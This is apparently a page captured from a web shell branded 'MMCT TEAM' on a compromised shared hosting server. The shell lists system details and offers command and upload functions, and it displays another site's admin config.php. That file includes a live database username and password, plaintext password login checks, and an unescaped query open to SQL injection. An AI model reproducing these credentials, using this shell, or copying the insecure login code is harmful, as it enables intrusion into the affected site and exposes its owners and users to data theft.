MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.191.192.109
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home2/ppcad7no/public_html/../snackpoint.co.nz/../arcsol.in/admin/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/public_html/../snackpoint.co.nz/../arcsol.in/admin/config.php
<?php 
session_start();

// connect to database
// $db = mysqli_connect('localhost', 'root', '', 'arcade');
$db = mysqli_connect('localhost', 'ppcad7no_arcsol', 'EM&GvuOR{01.', 'ppcad7no_arcsol');
// variable declaration
$username = "";
$email    = "";
$errors   = array(); 

if (isset($_POST['login_btn'])) {
	login();
}

// LOGIN USER
function login(){
	global $db, $username, $errors;

	// grap form values
	$username = e($_POST['username']);
	$password = e($_POST['password']);

	// make sure form is filled properly
	if (empty($username)) {
		array_push($errors, "Username is required");
	}
	if (empty($password)) {
		array_push($errors, "Password is required");
	}

	// attempt login if no errors on form
	if (count($errors) == 0) {
		// $password = md5($password);

		// Query for login_tbl
		$query1 = "SELECT * FROM login_tbl WHERE username='$username' AND password='$password' LIMIT 1;";
		$results1 = mysqli_query($db, $query1);

		if (mysqli_num_rows($results1) == 1) { // user found in login_tbl
    // check if user is admin or user
    $logged_in_user = mysqli_fetch_assoc($results1);
    if ($logged_in_user['user_type'] == 'supadmin') {
        $_SESSION['user'] = $logged_in_user;
        $_SESSION['success']  = "";
        header('location: index.php');		  
    } else if ($logged_in_user['user_type'] == 'admin') {
        $_SESSION['user'] = $logged_in_user;
        $_SESSION['success']  = "";
        header('location: index.php');		  
    } else if ($logged_in_user['user_type'] == 'user') {
        $_SESSION['user'] = $logged_in_user;
        $_SESSION['success']  = "";
        header('location: home.php');
    } else {
        $_SESSION['msg'] = "Invalid user type";
        header('location: login.php');
    }
} else {
    $_SESSION['msg'] = "Invalid username or password";
    header('location: login.php');
}


		// Query for members
		$query2 = "SELECT * FROM tbl_member WHERE username='$username' AND password='$password' LIMIT 1";
		$results2 = mysqli_query($db, $query2);

		if (mysqli_num_rows($results2) == 1) { 
			$logged_in_user = mysqli_fetch_assoc($results2);
			$_SESSION['user'] = $logged_in_user;
			$_SESSION['success']  = "";
			header('location:member_home.php');
		}

		// No user found in either table
		array_push($errors, "Wrong username/password ");
	}
}




function isAdmin()
{
	if (isset($_SESSION['user']) && $_SESSION['user']['user_type'] == 'admin' ) {
		return true;
	}else{
		return false;
	}
}

// return user array from their id
function getUserById($id){
	global $db;
	$query = "SELECT * FROM login_tbl WHERE id= $id";
	$result = mysqli_query($db, $query);

	$user = mysqli_fetch_assoc($result);
	return $user;
}

// escape string
function e($val){
	global $db;
	return mysqli_real_escape_string($db, trim($val));
}

function display_error() {
	global $errors;

	if (count($errors) > 0){
		echo '<div class="error">';
			foreach ($errors as $error){
				echo $error .'<br>';
			}
		echo '</div>';
	}
}

function isLoggedIn()
{
	if (isset($_SESSION['user'])) {
		return true;
	}else{
		return false;
	}
}

if (isset($_GET['logout'])) {
	session_destroy();
	unset($_SESSION['user']);
	header("location: login.php");
}
?>

MMCT - 2023